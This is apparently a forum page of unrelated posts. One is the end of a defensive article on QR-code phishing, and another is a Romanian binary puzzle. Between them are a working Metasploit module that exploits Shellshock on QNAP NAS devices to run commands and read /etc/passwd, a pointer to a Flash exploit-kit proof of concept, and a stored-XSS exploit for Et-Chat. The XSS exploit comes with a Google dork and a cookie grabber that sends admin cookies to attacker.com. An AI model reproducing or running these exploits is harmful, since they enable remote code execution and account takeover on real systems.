hacking web accounts. Attackers send a fake web login page which pretends to be the original login page of the website it’s claiming to be. When an innocent user use this fake page to login, his/her login information is sent to the attacker. And now, his/her password is in the hands of the attacker. Phishing is the main security issue involved with QR codes. It is also described as QRishing by some security researchers. QR codes are generally scanned by a smartphone camera to visit a website. Now, many website ads put QR code along with a URL so users can quickly scan QR code to visit the website. This is where scammers try to trick users. As I already told you, QR codes cannot be hacked. So, hackers or scammers try to change the QR code added in the poster. They can also print the similar kind of fake posters and put in public places. Innocent customers will scan these fake QR codes to visit the websites but they will be redirected to phishing websites. Most people judge a website by its look and feel, and phishing pages look exactly similar to legitimate websites. In mobile devices, it is hard to check the full address in the browsers. Due to limited space, browsers do not show the full address in the URL field. And most people never try to check the full address. This makes users more vulnerable. When they use this phishing page to login, their passwords are compromised. Although this phishing trick has limited scope, it is most effective. There are various case studies which clearly confirm that people generally trust QR codes and become the victim of QRishing at public places. Malicious software distribution Scammers generally use malicious websites to distribute malware via drive by download attack. Nowadays, most of the drive by download attacks are being done against Android users. Drive by download attacks are attacks in which a website forcefully downloads software in your device when you visit the website. It does not need any action from the user’s side. Visiting the website is enough to trigger the download action. Scammers try to install malicious apps and then exploit that device. These infected devices can join an existing botnet or can send SMS to premium numbers. It can also leak your data. By using QR codes to point to this kind of malicious websites, we can easily trick users. Users cannot see the URL, so there is no point of doubt. In QR codes, there is no need to enter the URL manually, users only scan QR code. And they only know what you will write about the QR code. In Russia, a malicious QR code on scanning sent SMS to premium numbers costing $5 USD per SMS. Most of these kinds of attacks have been seen against Android devices. Pointing to potentially harmful websites This is similar to what we learned in the previous point, but it is not about serving malware. Sometimes websites have browser exploits which can do lot more harm. Browser exploits can enable microphone/camera access, access browser data, send emails or join a botnet to perform a DDOS attack on any legit website. All these actions occur in the background, so users never know about this. They will only see a website, but they are being tricked. How to Protect Yourself from Malicious QR Codes Malicious QR codes have limited scope, but may be harmful. So, you need to be protective and always take care of your security while using QR codes. If you are going to use it from banners at public places, you need to be selective. There are few things which you can do to protect yourself from malicious QR codes and its attacks. Observe before use: If you find a QR code in any banner advertisement in a public place, look at it closely. Most of the times, scammers stick their fake QR code above the legitimate QR code in a legitimate poster. So try to see if it is real or not. You can check by touching the poster. If it does not look like it’s actually printed on the poster, do not use it. Follow this guideline for QR codes in public places. Your observation can save you from attacks. If you are not sure, never scan that QR code. Be suspicious and never giver personal or login info: Always be suspicious of the page you land on via QR code. Never share your personal information on these pages. Only do this if the QR code is from a very trusted source and you trust the website. And yes, avoid entering your login information. It may be a phishing page. So for login, always enter the URL manually on the browser’s address bar. Entering login information on the pages you land on via QR code means putting yourself in big trouble. So, why take the risk just to avoid a little extra effort? Open a browser, type the address and login directly on the website. Look at URL before proceeding: A few QR code scanners also show the actual URL before proceeding and ask to confirm whether you want to visit the URL. You can use these QR code scanners to know what URL the QR code will send you. This will help you to know if the QR code is malicious or not. Looking at the QR code does not confirm whether it is malicious or not. So, I recommend use of safe QR code scanners. Norton Snap is a nice QR code scanner app with built-in security features. This app is available for both Android and iOS platforms. You can use this QR code scanner app to prevent any malicious activity in your smartphone. It not only shows the URLs but also checks the URLs within its database of malicious links. If it finds any malicious URLs within the QR code, it will warn you. Conclusion Although QR codes are not new, their use is still very limited. With the increasing use of smartphones, we have seen sudden a rise in the use of QR codes. Now various websites and apps let users use a QR code to login or complete other tasks. But there are still very few users who use QR codes. This is the reason why there is little reporting on malicious QR codes. Nobody wants to waste time on things which have low impact. But this will change very soon. With the launch of WhatsApp for web, now many users know how to use QR codes. So, we can expect another sudden rise in the use of QR codes. And when it is used by a greater number of users, attackers will surely find new ways to exploit its weaknesses. As of now, QR code risks have limited scope, but when there are more users, there will surely become a bigger risk. In the near future, we will also see the use of QR codes for payments and money transfer. At that time, it will be very important to follow security rules. As of now, we only need to use a good and secure QR code scanner app and then relax. Having a good anti-virus and Internet security app is also recommended. This will warn if a website is a phishing website or trying to install a dangerous app in your smartphone. I hope you have found this article interesting. If you use QR code, do not forget to be safe. References http://usa.kaspersky.com/about-us/press-center/press-blog/malicious-qr-codes-attack-methods-techniques-infographic https://www.andrew.cmu.edu/user/nicolasc/publications/Vidas-USEC13.pdf http://en.wikipedia.org/wiki/QR_code Source
  21. # Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] # Employer homepage: http://www.securegroup.it # Vendor homepage: http://www.qnap.com # Version: All Turbo NAS models except TS-100, TS-101, TS-200 # Tested on: TS-1279U-RP # CVE : 2014-6271 # Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61 ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/d3vpp/metasploit-modules ## require 'msf/core' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection', 'Description' => %q{ This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system. Affected products: All Turbo NAS models except TS-100, TS-101, TS-200 }, 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-6271'], #aka ShellShock ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61'] ], 'Platform' => ['unix'] )) register_options([ OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']), OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd']) ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; /usr/bin/id" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE vprint_error("Connection failed") return Exploit::CheckCode::Unknown end if !res return Exploit::CheckCode::Unknown elsif res.code== 302 and res.body.include? 'uid' return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def run res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; #{datastore['CMD']}" }) if res.body.empty? print_error("No data found.") elsif res.code== 302 print_status("#{rhost}:#{rport} - bash env variable injected") puts " " print_line(res.body) end end end Source
  22. Source: https://github.com/SecurityObscurity/cve-2015-0313 PoC: http://www.exploit-db.com/sploits/36491.zip Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit Reference: Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements Malware don't need Coffee: CVE-2015-0313 (Flash up to 16.0.0.296) and Exploit Kits https://helpx.adobe.com/security/products/flash-player/apsa15-02.html Source: http://www.exploit-db.com/exploits/36491/
  23. # Exploit Title: Et-Chat 3.0.6 Cross Site Scripting Vulnerability # Google Dork: "ET-Chat v3.0.6" # Date: 2015-03-20 # Exploit Author: IranHack Security Team # Tested on: Windows 7 # Vendor : Www.Et-chat.Ir # Our Website : Www.IranHack.Org *************************************************** Vulnerable code : Location : /etchat/class/admin/AdminRoomsIndex.class.php Code : if (is_array($feld)){ $print_room_list = "<table>"; foreach($feld as $datasets){ if ($datasets[0]!=1) $print_room_list.= "<tr><td><b>".$datasets[1]."</b></td><td> </td><td><a href=\"./?AdminDeleteRoom&id=".$datasets[0]."&cs4rue=".$_SESSION['etchat_'.$this->_prefix.'CheckSum4RegUserEdit']."\">".$lang->delete[0]->tagData."</a></td><td><a href=\"./?AdminEditRoom&id=".$datasets[0]."\">".$lang->rename[0]->tagData."</a></td><td> <i>".$lang->room_priv[$datasets[2]]->tagData."</i></td></tr>"; else $print_room_list.= "<tr><td><b>".$datasets[1]."</b></td><td> </td><td style=\"color: #888888;\"><strike>".$lang->delete[0]->tagData."</strike></td><td><a href=\"./?AdminEditRoom&id=".$datasets[0]."\">".$lang->rename[0]->tagData."</a></td><td> <i>".$lang->room_priv[$datasets[2]]->tagData."</i></td></tr>"; } $print_room_list.= "</table>"; } *************************************************** Description : This vulnerability allows attacker to grab admin cookie and login with admin account The reason of this vulnerability is that values of the room list ( ".$datasets[1]." ) is not filtered and allows attacker to run javascript code. *************************************************** Exploit : 1- Upload this page in a host or Set this code in a html page : <html> <body> <form name="exploit" action="http://target.com/etchat/?AdminCreateNewRoom" method="POST"> <input type="hidden" name="room" value="<script>location.href="http://attacker.com/grabber.php?cookie="+escape(document.cookie)</script> " /> <script>document.exploit.submit(); </script> </form> </body> </html> 2- Give the uploaded html page address to admin. 3- after opening this page by admin , cookies are logged in Log.txt *************************************************** grabber.php : http://up.iranhack.org/uploads/lquswjwo06vrxz1fe4oo.zip *************************************************** Patch : If u wanna patch this bug , go to file " /etchat/class/admin/AdminRoomsIndex.class.php " Replace this codes : ".$datasets[1]." With this code : ".htmlspecialchars($datasets[1])." *************************************************** Greetz : Mr.XpR , V30Sharp , AL1R3Z4 , Secret.Walker , Irblackhat , FarbodEZRaeL , black-sec , Mr.X2 , @3is , IR4N0nY , , 0x8F , Amirio , 3cure , FTA_Boy , Mr.FixXxer ./Moji.Rider Source
  24. Am gasit urmatorul puzzle foarte interesant: During the recent BrainBashers cipher convention, a binary code contest took place. The contest consisted of a binary code transmission where the spaces between the letters were missing and there was no punctuation. Each letter of the alphabet was translated into its binary equivalent based on its position in the alphabet: a=1, b=10, c=11, d=100, e=101, f=110, g=111, h=1000, i=1001, j=1010, k=1011, l=1100, m=1101, n=1110, o=1111, p=10000, q=10001, r=10010, s=10011, t=10100, u=10101, v=10110, w=10111, x=11000, y=11001, z=11010. What is the answer to the question being asked? 110011101001000100110011100110011110110 101100101100110010011101101001111010111 001010010000101011101011010110010110011 010010001111101011111000101001001101001 011111111010111001001000101110010000100 111010011100111011101100110011100111011 000011001011000110101101100111010010011 111111010111100011010010011001111111110 101100001100101011001111111110101 Ma gandesc daca poate cineva sa il faca. PS:Eu am incercat dar m-am dat batut dupa primul rand.
×
×
  • Create New...